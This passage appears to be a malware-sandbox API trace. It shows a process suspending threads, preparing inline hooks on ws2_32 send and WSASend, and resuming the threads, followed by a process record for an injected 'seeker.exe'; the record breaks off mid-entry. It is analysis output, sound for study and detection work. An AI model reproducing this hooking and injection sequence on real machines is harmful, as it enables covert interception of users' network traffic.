Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.258] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.258] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.258] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.258] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.259] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.259] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.259] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.260] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.260] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.260] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.260] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.261] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.261] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.261] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.261] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.262] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.262] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.262] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.263] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.263] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.263] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.263] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.264] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.264] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.264] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.265] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.265] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.265] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.265] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.266] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.266] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.266] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.266] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.267] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.267] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.267] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.268] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.268] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.268] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.269] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.269] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.269] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.269] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.270] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.270] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.270] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.271] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.271] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.271] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.271] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.272] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.272] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.272] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.273] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.273] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.273] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.273] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.274] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.274] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.274] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.274] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.275] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.275] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.275] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.276] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.276] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.372] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x178) returned 0x8c [0169.372] SuspendThread (hThread=0x8c) returned 0x0 [0169.372] CloseHandle (hObject=0x8c) returned 1 [0169.372] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c0) returned 0x8c [0169.372] SuspendThread (hThread=0x8c) returned 0x0 [0169.372] CloseHandle (hObject=0x8c) returned 1 [0169.399] CloseHandle (hObject=0x88) returned 1 [0169.399] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0169.399] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0169.399] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0169.399] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x80000 [0169.400] RtlMoveMemory (in: Destination=0x80000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x80000) [0169.400] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0169.405] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0169.406] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0169.406] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0169.406] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x90000 [0169.406] RtlMoveMemory (in: Destination=0x90000, Source=0x75bc4406, Length=0x5 | out: Destination=0x90000) [0169.406] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0169.458] GetCurrentProcessId () returned 0x310 [0169.458] GetCurrentThreadId () returned 0x750 [0169.458] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0169.459] Thread32First (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.460] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.460] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.460] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.460] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.461] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.461] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.461] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.462] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.462] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.462] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.462] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.463] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.463] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.463] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.464] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.464] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.464] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.464] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.465] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.465] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.465] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.465] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.466] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.466] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.466] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.467] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.467] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.467] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.467] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.468] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.468] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.468] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.469] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.469] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.469] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.469] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.470] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.470] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.470] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.470] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.471] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.471] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.472] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.472] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.472] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.472] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.473] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.473] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.473] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.473] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.474] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.474] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.474] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.475] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.475] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.475] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.475] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.476] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.476] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.476] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.476] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.477] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.477] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.477] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.478] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.478] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.478] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.478] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.479] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.479] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.479] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.480] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.480] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.480] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.480] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.481] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.481] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.481] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.482] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.482] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.482] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.482] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.483] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.483] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.483] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.483] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.484] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.484] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.484] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.485] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.485] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.485] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.485] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.486] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.486] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.486] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.486] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.487] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.487] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.488] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.488] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.488] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.488] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.489] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.489] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.489] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.489] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.490] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.490] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.490] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.491] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.491] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.491] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.491] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.492] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.492] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.492] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.493] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.493] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.493] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.493] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.494] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.494] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.494] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.494] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.495] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.495] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.495] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.496] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.496] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.496] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.496] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.497] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.497] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.497] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.498] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.498] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.498] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.498] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.499] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.499] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.499] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.500] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.500] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.500] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.500] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.501] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.501] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.501] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.501] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.502] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.502] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.682] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.682] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.682] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.683] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.683] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.683] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.683] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.684] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.684] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.684] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.685] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.685] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.685] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.685] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.686] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.686] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.686] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.686] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.687] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.687] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.687] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.688] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.688] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.688] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.688] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.689] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.689] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.689] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.690] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.690] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.690] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.690] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.691] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.691] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.691] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.692] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.692] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.692] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.692] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.693] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.693] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.693] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.694] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.694] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.694] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.694] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.695] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.695] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.695] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.695] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.696] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.696] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.696] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.697] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.697] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.697] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.697] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.698] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.698] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.698] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.699] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.699] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.699] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.699] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.700] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.700] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.700] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.701] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.701] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.701] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.701] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.702] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.702] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.702] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.702] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.703] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.703] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.703] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.704] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.704] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.704] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.704] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.705] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.705] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.705] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.706] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.706] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.706] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.707] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.707] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.707] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.707] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.708] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.708] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.708] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.709] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.709] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.847] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x178) returned 0x8c [0169.847] ResumeThread (hThread=0x8c) returned 0x1 [0169.847] CloseHandle (hObject=0x8c) returned 1 [0169.847] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c0) returned 0x8c [0169.847] ResumeThread (hThread=0x8c) returned 0x1 [0169.847] CloseHandle (hObject=0x8c) returned 1 [0169.873] CloseHandle (hObject=0x88) returned 1 [0169.873] VirtualQuery (in: lpAddress=0x6d09a0, lpBuffer=0x243fe04, dwLength=0x1c | out: lpBuffer=0x243fe04*(BaseAddress=0x6d0000, AllocationBase=0x6b0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.873] GetProcessHeap () returned 0x6b0000 [0169.873] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d09a0 | out: hHeap=0x6b0000) returned 1 [0169.873] VirtualQuery (in: lpAddress=0x6d0890, lpBuffer=0x243fe04, dwLength=0x1c | out: lpBuffer=0x243fe04*(BaseAddress=0x6d0000, AllocationBase=0x6b0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.873] GetProcessHeap () returned 0x6b0000 [0169.873] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d0890 | out: hHeap=0x6b0000) returned 1 [0169.873] RtlExitUserThread (Status=0x0) Process: id = "27" image_name = "seeker.exe" filename = "c:\\program files (x86)\\windows photo viewer\\seeker.exe" page_root = "0x666e2000" os_pid = "0x314" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\seeker.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 